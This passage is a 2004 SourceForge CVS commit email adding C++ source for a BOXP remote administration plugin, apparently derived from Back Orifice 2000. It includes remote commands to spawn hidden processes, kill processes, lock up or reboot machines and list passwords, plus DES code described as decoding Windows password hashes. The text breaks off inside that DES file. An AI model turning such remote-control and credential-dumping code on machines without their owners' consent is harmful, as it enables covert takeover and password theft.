[Boxp-cvs] boxp/srv_system cmd_process.cpp,NONE,1.1 cmd_process.h,NONE,1.1 cmd_system.cpp,NONE,1.1 c
Status: Beta
Brought to you by:
j_aroche
From: Javier A. \(RA\) <j_a...@us...> - 2004-09-10 22:00:07
|
Update of /cvsroot/boxp/boxp/srv_system In directory sc8-pr-cvs1.sourceforge.net:/tmp/cvs-serv14839/srv_system Added Files: cmd_process.cpp cmd_process.h cmd_system.cpp cmd_system.h deshash.cpp deshash.h dumppw.cpp dumppw.h main.cpp main.h srv_system.dsp Log Message: Initial Import Javier Aroche --- NEW FILE: main.cpp --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #include <srv_linkage.h> #include "main.h" #include "cmd_process.h" #include "cmd_system.h" // ------------- Function Implementations ------------------ HINSTANCE g_hInstance; BOOL g_bActive; int g_nCmdNum[7]; BOOL WINAPI DllMain(HINSTANCE hInst, ULONG ul_reason_for_call, LPVOID lpReserved) { // Do NOT perform configuration or initialization here switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: g_hInstance=hInst; break; } return TRUE; } bool BOAPI InitPlugin ( GS *gs, PI *pi ) { if (gs->nSize!=sizeof(GS)) return false; SRV *srv = gs->srv; g_bActive=TRUE; if ( srv ) { // Process Control g_nCmdNum[0]=srv->RegCommand(gs, CmdProc_ProcessList, NULL, "Process Control","List Processes",NULL,"[Remote machine]",NULL, BF_READONLY); g_nCmdNum[1]=srv->RegCommand(gs, CmdProc_ProcessKill, NULL, "Process Control","Kill Process",NULL,"Process ID",NULL, BF_READONLY); g_nCmdNum[2]=srv->RegCommand(gs, CmdProc_ProcessSpawn, NULL, "Process Control","Start Process", NULL, "0=Show, 1=Hide","Pathname and arguments",BF_WRITE); // System Commands g_nCmdNum[3]=srv->RegCommand(gs,CmdProc_SysReboot, NULL, "System","Reboot Machine",NULL,NULL,NULL, BF_WRITE); g_nCmdNum[4]=srv->RegCommand(gs,CmdProc_SysLockup, NULL, "System","Lock-up Machine",NULL,NULL,NULL, BF_WRITE); g_nCmdNum[5]=srv->RegCommand(gs,CmdProc_SysListPasswords, NULL, "System","List Passwords",NULL,NULL,NULL, BF_READONLY); g_nCmdNum[6]=srv->RegCommand(gs,CmdProc_SysInfo, NULL, "System","Get System Info",NULL,NULL,NULL, BF_READONLY); return true; } return false; } void BOAPI DelPlugin ( GS *gs ) { g_bActive=FALSE; if (gs->srv==NULL) return; for(int i=0; i<7; i++) { gs->srv->UnregCommand(gs,g_nCmdNum[i]); } } bool BOAPI PlugVer ( PLUGIN_INFO *pv ) { pv->wVerHi = 1; pv->wVerLo = 0; pv->wHiBOVer = 1; pv->wLoBOVer = 00; pv->svID = "SRVSYSTEM\0"; pv->svName = "srv_system.dll"; pv->svDesc = "BOXP System Commands"; pv->pConfigStr = NULL; pv->nConfigLen = 0; pv->bRunAsThread= false; pv->Flags = PF_SRV; pv->Type = PLG_CMD; return true; } --- NEW FILE: deshash.h --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #ifndef __INC_DESHASH_H #define __INC_DESHASH_H #include<windows.h> int BOAPI DESHash_Insert(GS *gs); int BOAPI DESHash_Remove(GS *gs); void * BOAPI DESHash_Startup(GS *gs); int BOAPI DESHash_Shutdown(GS *gs, void *pInternal); int BOAPI DESHash_SetEncryptKey(GS *gs, void *pInternal, const char *svKey); int BOAPI DESHash_SetDecryptKey(GS *gs, void *pInternal, const char *svKey); char * BOAPI DESHash_GetEncryptKey(GS *gs, void *pInternal); char * BOAPI DESHash_GetDecryptKey(GS *gs, void *pInternal); BYTE * BOAPI DESHash_Encrypt(GS *gs, void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen); BYTE * BOAPI DESHash_Decrypt(GS *gs, void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen); int BOAPI DESHash_CreateNewKeys(GS *gs, void *pInternal); void BOAPI DESHash_Free(GS *gs, void *pInternal, BYTE *pBuffer); ENCRYPTION_ENGINE *GetDESHashEngine( void ); #endif --- NEW FILE: dumppw.h --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #ifndef __INC_DUMPPW_H #define __INC_DUMPPW_H #include <srv_linkage.h> int DumpPasswordHashes(GS *gs, BOCMD_CTX *ctx); #endif --- NEW FILE: cmd_process.cpp --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #include <srv_linkage.h> #include"main.h" #include"cmd_process.h" bool BOAPI CmdProc_ProcessList( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { FCT *fct = &gs->fct; API *api = &gs->api; char svBuffer[1024]; PROCESSINFO *pinfo,*cur; if(svArg2) if(svArg2[0]=='\0') svArg2=NULL; pinfo=fct->CreateProcListSnapshot(gs, svArg2); for(cur=pinfo;cur;cur=cur->next) { THREADINFO *pti; int nThreads; nThreads=0; for(pti=cur->pThread;pti;pti=pti->next) nThreads++; api->pwsprintf(svBuffer,"(0x%X) %s %d threads\n",cur->dwProcID,cur->svApp,nThreads); fct->IssueAuthCmdReply(gs, ctx, 0, svBuffer); } fct->IssueAuthCmdReply(gs, ctx, 0, "End process list.\n"); fct->DestroyProcListSnapshot(gs, pinfo); return 0; } bool BOAPI CmdProc_ProcessKill( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { FCT *fct = &gs->fct; API *api = &gs->api; // Get pid string (hex) char *svPid; fct->CharUpper(svArg2); svPid=fct->BreakString(svArg2,"0X", gs); if( svPid==NULL ) svPid=svArg2; // Convert to dword DWORD dwPid; dwPid=0; while(*svPid) { char c; c=*svPid; if(c>='A' && c<='F') c=c-'A'+0xA; else if(c>='0' && c<='9') c-='0'; else c=0; dwPid<<=4; dwPid|=c; svPid++; } // Open process handle HANDLE hProc; hProc=api->pOpenProcess(PROCESS_TERMINATE,FALSE,dwPid); if(hProc==NULL) { fct->IssueAuthCmdReply( gs, ctx, BCC_ERR, "Could not access process.\n" ); return false; } if(api->pTerminateProcess(hProc,0)==0) { fct->IssueAuthCmdReply( gs, ctx, BCC_ERR, "Could not terminate process.\n" ); return false; } fct->IssueAuthCmdReply( gs, ctx, 0, "Process terminated.\n" ); return true; } bool BOAPI CmdProc_ProcessSpawn( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { STARTUPINFO si; PROCESS_INFORMATION pi; si.cb=sizeof(STARTUPINFO); gs->fct.memset(&si,0,sizeof(STARTUPINFO)); si.dwFlags=STARTF_FORCEOFFFEEDBACK|STARTF_USESHOWWINDOW; si.wShowWindow=(nArg1==1)?SW_HIDE:SW_SHOW; HINSTANCE ShellExError; if(gs->api.pCreateProcess( NULL, svArg2, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi)==0) { ShellExError = ShellExecute(NULL, "open", svArg2, NULL, NULL, si.wShowWindow); if (int(ShellExError)<= 32) { gs->fct.IssueAuthCmdReply(gs,ctx,BCC_ERR,"Could not spawn process.\n"); return false; } } gs->fct.IssueAuthCmdReply( gs, ctx, 0, "Process spawned.\n" ); return true; } --- NEW FILE: cmd_process.h --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #ifndef __INC_CMD_PROCESS_H #define __INC_CMD_PROCESS_H #include <srv_linkage.h> bool BOAPI CmdProc_ProcessList( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_ProcessKill( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_ProcessSpawn( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); #endif --- NEW FILE: srv_system.dsp --- # Microsoft Developer Studio Project File - Name="srv_system" - Package Owner=<4> # Microsoft Developer Studio Generated Build File, Format Version 6.00 # ** DO NOT EDIT ** # TARGTYPE "Win32 (x86) Dynamic-Link Library" 0x0102 CFG=srv_system - Win32 Debug !MESSAGE This is not a valid makefile. To build this project using NMAKE, !MESSAGE use the Export Makefile command and run !MESSAGE !MESSAGE NMAKE /f "srv_system.mak". !MESSAGE !MESSAGE You can specify a configuration when running NMAKE !MESSAGE by defining the macro CFG on the command line. For example: !MESSAGE !MESSAGE NMAKE /f "srv_system.mak" CFG="srv_system - Win32 Debug" !MESSAGE !MESSAGE Possible choices for configuration are: !MESSAGE !MESSAGE "srv_system - Win32 Release" (based on "Win32 (x86) Dynamic-Link Library") !MESSAGE "srv_system - Win32 Debug" (based on "Win32 (x86) Dynamic-Link Library") !MESSAGE # Begin Project # PROP AllowPerConfigDependencies 0 # PROP Scc_ProjName "" # PROP Scc_LocalPath "" CPP=cl.exe MTL=midl.exe RSC=rc.exe !IF "$(CFG)" == "srv_system - Win32 Release" # PROP BASE Use_MFC 0 # PROP BASE Use_Debug_Libraries 0 # PROP BASE Output_Dir "Release" # PROP BASE Intermediate_Dir "Release" # PROP BASE Target_Dir "" # PROP Use_MFC 0 # PROP Use_Debug_Libraries 0 # PROP Output_Dir "..\Exes\plugins\" # PROP Intermediate_Dir "Release" # PROP Ignore_Export_Lib 0 # PROP Target_Dir "" # ADD BASE CPP /nologo /MT /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "SRV_SYSTEM_EXPORTS" /YX /FD /c # ADD CPP /nologo /Gz /Zp1 /MT /W3 /O1 /I ".\include" /I "..\boxp\include" /I "..\bogui\include" /I "..\bocfg\include" /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "SRV_SYSTEM_EXPORTS" /FD /c # ADD BASE MTL /nologo /D "NDEBUG" /mktyplib203 /win32 # ADD MTL /nologo /D "NDEBUG" /mktyplib203 /win32 # ADD BASE RSC /l 0x409 /d "NDEBUG" # ADD RSC /l 0x409 /d "NDEBUG" BSC32=bscmake.exe # ADD BASE BSC32 /nologo # ADD BSC32 /nologo LINK32=link.exe # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /machine:I386 # ADD LINK32 kernel32.lib user32.lib gdi32.lib comdlg32.lib advapi32.lib shell32.lib mpr.lib /nologo /base:"0x09480000" /entry:"DllMain@12" /dll /pdb:none /machine:I386 /def:"..\boxp\plug.def" /implib:".\Release\srv_system.lib" /opt:nowin98 # SUBTRACT LINK32 /nodefaultlib !ELSEIF "$(CFG)" == "srv_system - Win32 Debug" # PROP BASE Use_MFC 0 # PROP BASE Use_Debug_Libraries 1 # PROP BASE Output_Dir "Debug" # PROP BASE Intermediate_Dir "Debug" # PROP BASE Target_Dir "" # PROP Use_MFC 0 # PROP Use_Debug_Libraries 1 # PROP Output_Dir "..\Exes\plugins\" # PROP Intermediate_Dir "Debug" # PROP Ignore_Export_Lib 0 # PROP Target_Dir "" # ADD BASE CPP /nologo /MTd /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "SRV_SYSTEM_EXPORTS" /YX /FD /GZ /c # ADD CPP /nologo /Gz /Zp1 /MTd /W3 /Gm /Zi /Od /I ".\include" /I "..\boxp\include" /I "..\bogui\include" /I "..\bocfg\include" /D "WIN32" /D "_DEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "SRV_SYSTEM_EXPORTS" /FD /c # SUBTRACT CPP /Fr # ADD BASE MTL /nologo /D "_DEBUG" /mktyplib203 /win32 # ADD MTL /nologo /D "_DEBUG" /mktyplib203 /win32 # ADD BASE RSC /l 0x409 /d "_DEBUG" # ADD RSC /l 0x409 /d "_DEBUG" BSC32=bscmake.exe # ADD BASE BSC32 /nologo # ADD BSC32 /nologo LINK32=link.exe # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /debug /machine:I386 /pdbtype:sept # ADD LINK32 kernel32.lib user32.lib gdi32.lib comdlg32.lib advapi32.lib mpr.lib shell32.lib /nologo /base:"0x09480000" /entry:"DllMain@12" /dll /incremental:no /pdb:".\Debug\_srv_system.pdb" /debug /machine:I386 /def:"..\boxp\plug.def" /out:"..\Exes\plugins\_srv_system.dll" /implib:".\Debug\_srv_system.lib" /pdbtype:sept # SUBTRACT LINK32 /pdb:none /nodefaultlib !ENDIF # Begin Target # Name "srv_system - Win32 Release" # Name "srv_system - Win32 Debug" # Begin Group "Source Files" # PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat" # Begin Source File SOURCE=.\cmd_process.cpp # End Source File # Begin Source File SOURCE=.\cmd_system.cpp # End Source File # Begin Source File SOURCE=.\deshash.cpp # End Source File # Begin Source File SOURCE=.\dumppw.cpp # End Source File # Begin Source File SOURCE=.\main.cpp # End Source File # End Group # Begin Group "Header Files" # PROP Default_Filter "h;hpp;hxx;hm;inl" # Begin Group "support headers" # PROP Default_Filter "" # Begin Source File SOURCE=..\..\boxp\include\srv_linkage.h # End Source File # End Group # Begin Source File SOURCE=.\cmd_process.h # End Source File # Begin Source File SOURCE=.\cmd_system.h # End Source File # Begin Source File SOURCE=.\deshash.h # End Source File # Begin Source File SOURCE=.\dumppw.h # End Source File # Begin Source File SOURCE=.\main.h # End Source File # End Group # End Target # End Project --- NEW FILE: deshash.cpp --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ /* Note on DES Hashing: This module has been crippled such that it is NOT usable for encryption per United States export ITAR regulations. This module only operates on hashes for authentication, which are not regulated by ITAR. Used ONLY for decoding the internal Windows password hashes in dumppw.cpp Developer note: As this is not an encryption module, it is not coded to the standards of the CEncryptionEngine. It only uses CEncryptionEngine format as a convenience. */ #include <srv_linkage.h> // ---------- Tables defined in the Data Encryption Standard documents ---------------------------- // Initial permutation IP static BYTE ip[] = { 58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4, 62, 54, 46, 38, 30, 22, 14, 6, 64, 56, 48, 40, 32, 24, 16, 8, 57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3, 61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7 }; // Final permutation IP^-1 static BYTE fp[] = { 40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31, 38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29, 36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27, 34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25 }; // permuted choice table (key) static BYTE pc1[] = { 57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52, 44, 36, 63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 28, 20, 12, 4 }; // number left rotations of pc1 static BYTE totrot[] = { 1,2,4,6,8,10,12,14,15,17,19,21,23,25,27,28 }; // permuted choice key (table) static BYTE pc2[] = { 14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10, 23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2, 41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48, 44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32 }; // The s boxes static BYTE si[8][64] = { // S1 { 14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13 }, // S2 { 15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10, 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5, 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15, 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9 }, // S3 { 10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8, 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1, 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7, 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12 }, // S4 { 7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15, 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9, 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4, 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14 }, // S5 { 2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9, 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6, 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14, 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3 }, // S6 { 12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11, 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8, 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6, 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13 }, // S7 { 4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1, 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6, 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2, 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12 }, // S8 { 13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7, 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2, 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8, 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11 } }; // 32-bit permutation function P used on the output of the S-boxes static BYTE p32i[] = { 16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10, 2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25 }; // ---- Global Variables ------------------------------------------------ ENCRYPTION_ENGINE g_DESengine={NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL}; DWORD sp[8][64]; // Combined S and P boxes BYTE iperm[16][16][8]; // Initial permutations BYTE fperm[16][16][8]; // Final permutations int bytebit[] = { 0200,0100,040,020,010,04,02,01 }; int nibblebit[] = { 010,04,02,01 }; // ---- Structures ------------------------------------------------------ typedef struct { BYTE kn[16][8]; // 8 6-bit subkeys for each of 16 initialized by des_setkey() } DESHASH_DATA; // ---- Function Prototypes --------------------------------------------- int BOAPI DESHash_Insert(GS *gs); int BOAPI DESHash_Remove(GS *gs); char * BOAPI DESHash_Query(void); void * BOAPI DESHash_Startup(GS *gs); int BOAPI DESHash_Shutdown(GS *gs, void *pInternal); int BOAPI DESHash_SetEncryptKey(GS *gs, void *pInternal, const char *svKey); int BOAPI DESHash_SetDecryptKey(GS *gs, void *pInternal, const char *svKey); char * BOAPI DESHash_GetEncryptKey(GS *gs, void *pInternal); char * BOAPI DESHash_GetDecryptKey(GS *gs, void *pInternal); BYTE * BOAPI DESHash_Encrypt(GS *gs, void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen); BYTE * BOAPI DESHash_Decrypt(GS *gs, void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen); int BOAPI DESHash_CreateNewKeys(GS *gs, void *pInternal); void BOAPI DESHash_Free(GS *gs, void *pInternal, BYTE *pBuffer); // ---- Function Declarations ------------------------------------------- #ifndef BIG_ENDIAN // Byte swap a long DWORD byteswap(DWORD x) { char *cp,tmp; cp = (char *)&x; tmp = cp[3]; cp[3] = cp[0]; cp[0] = tmp; tmp = cp[2]; cp[2] = cp[1]; cp[1] = tmp; return x; } #endif // ---- initialize a perm array ---- static void perminit(BYTE perm[16][16][8], BYTE p[64]) { int i,j,k,l,m; // Clear the permutation array for (i=0; i<16; i++) { for (j=0; j<16; j++) { // Clear permutation for (k=0; k<8; k++) { perm[i][j][k]=0; } // each input nibble position for (i=0; i<16; i++) { // each possible input nibble for (j = 0; j < 16; j++) { // each output bit position for (k = 0; k < 64; k++) { // where does this bit come from l = p[k] - 1; // does it come from input posn if ((l >> 2) != i) continue; // if not, bit k is 0 // any such bit in input? if (!(j & nibblebit[l & 3])) continue; // which bit is this in the byte? m = k & 07; perm[i][j][k>>3] |= (char)bytebit[m]; } } } } } } // ---- Initialize the lookup table for the combined S and P boxes ---- static void spinit() { BYTE pbox[32]; int p,i,s,j,rowcol; DWORD val; // Compute pbox, the inverse of p32i. // This is easier to work with for(p=0;p<32;p++){ for(i=0;i<32;i++){ if(p32i[i]-1 == p){ pbox[p] = (char)i; break; } } } // For each S-box for(s = 0; s < 8; s++) { // For each possible input for(i=0; i<64; i++) { val = 0; // The row number is formed from the first and last // bits; the column number is from the middle 4 rowcol = (i & 32) | ((i & 1) ? 16 : 0) | ((i >> 1) & 0xf); for(j=0;j<4;j++) { // For each output bit if(si[s][rowcol] & (8 >> j)){ val |= 1L << (31 - pbox[4*s + j]); } } sp[s][i] = val; } } } // permute: takes an input block, passes it through a permutation // (if desmode == 0) and returns an output block void des_permute(GS *gs, BYTE *inblock, BYTE perm[16][16][8], BYTE *outblock) { int i,j; BYTE *ib,*ob,*p,*q; // Clear Output block gs->fct.memset(outblock, 0, 8*sizeof(BYTE)); // Perform permutation ib = inblock; for (j = 0; j < 16; j += 2, ib++) { // for each input nibble ob = outblock; p = perm[j][(*ib >> 4) & 017]; q = perm[j + 1][*ib & 017]; for (i = 8; i != 0; i--){ // and each output byte *ob++ |= *p++ | *q++; // OR the masks together } } } // The nonlinear function f(r,k), the heart of DES static DWORD f(DWORD r, BYTE subkey[8]) { DWORD rval,rt; // Run E(R) ^ K through the combined S & P boxes // This code takes advantage of a convenient regularity in // E, namely that each group of 6 bits in E(R) feeding // a single S-box is a contiguous segment of R. rt = (r >> 1) | ((r & 1) ? 0x80000000 : 0); rval = 0; rval |= sp[0][((rt >> 26) ^ *subkey++) & 0x3f]; rval |= sp[1][((rt >> 22) ^ *subkey++) & 0x3f]; rval |= sp[2][((rt >> 18) ^ *subkey++) & 0x3f]; rval |= sp[3][((rt >> 14) ^ *subkey++) & 0x3f]; rval |= sp[4][((rt >> 10) ^ *subkey++) & 0x3f]; rval |= sp[5][((rt >> 6) ^ *subkey++) & 0x3f]; rval |= sp[6][((rt >> 2) ^ *subkey++) & 0x3f]; rt = (r << 1) | ((r & 0x80000000) ? 1 : 0); rval |= sp[7][(rt ^ *subkey) & 0x3f]; return rval; } // round: Do one DES cipher round void des_round(GS *gs, int num, DWORD *block, BYTE kn[16][8]) { // The rounds are numbered from 0 to 15. On even rounds // the right half is fed to f() and the result exclusive-ORs // the left half; on odd rounds the reverse is done. if(num & 1) block[1] ^= f(block[0],kn[num]); else block[0] ^= f(block[1],kn[num]); } // In-place decryption of 64-bit block void des_dedes(GS *gs, BYTE *block, BYTE kn[16][8]) { int i; DWORD work[2], tmp; // Initial permutation des_permute(gs, block,iperm,(BYTE *)work); #ifndef BIG_ENDIAN work[0] = byteswap(work[0]); work[1] = byteswap(work[1]); #endif // Left/right half swap tmp = work[0]; work[0] = work[1]; work[1] = tmp; // Do the 16 rounds in reverse order for (i=15; i >= 0; i--) des_round(gs, i,work, kn); // Inverse initial permutation #ifndef BIG_ENDIAN work[0] = byteswap(work[0]); work[1] = byteswap(work[1]); #endif des_permute(gs, (BYTE *)work,fperm,block); } // setkey: // initializes key schedule array // key is 64 bits (will use only 56) void des_setkey(BYTE *key, BYTE kn[16][8]) { BYTE pc1m[56]; // place to modify pc1 into BYTE pcr[56]; // place to rotate pc1 into register int i,j,l,m; // Clear key schedule for (i=0; i<16; i++) { for (j=0; j<8; j++) { kn[i][j]=0; } } // Convert pc1 to bits of key for(j=0; j<56; j++) { l=pc1[j]-1; // integer bit location m = l & 07; // find bit pc1m[j]= (char)((key[l>>3] & // find which key byte l is in bytebit[m]) // and which bit of that byte ? 1 : 0); // and store 1-bit result } // Key chunk for each iteration for (i=0; i<16; i++) { // Rotate pc1 the right amount for (j=0; j<56; j++) pcr[j] = pc1m[(l=j+totrot[i])<(j<28? 28 : 56) ? l: l-28]; // Rotate left and right halves independently for (j=0; j<48; j++) { // select bits individually // check bit that goes to kn[j] if (pcr[pc2[j]-1]) { // mask it in if it's there l= j % 6; kn[i][j/6] |= 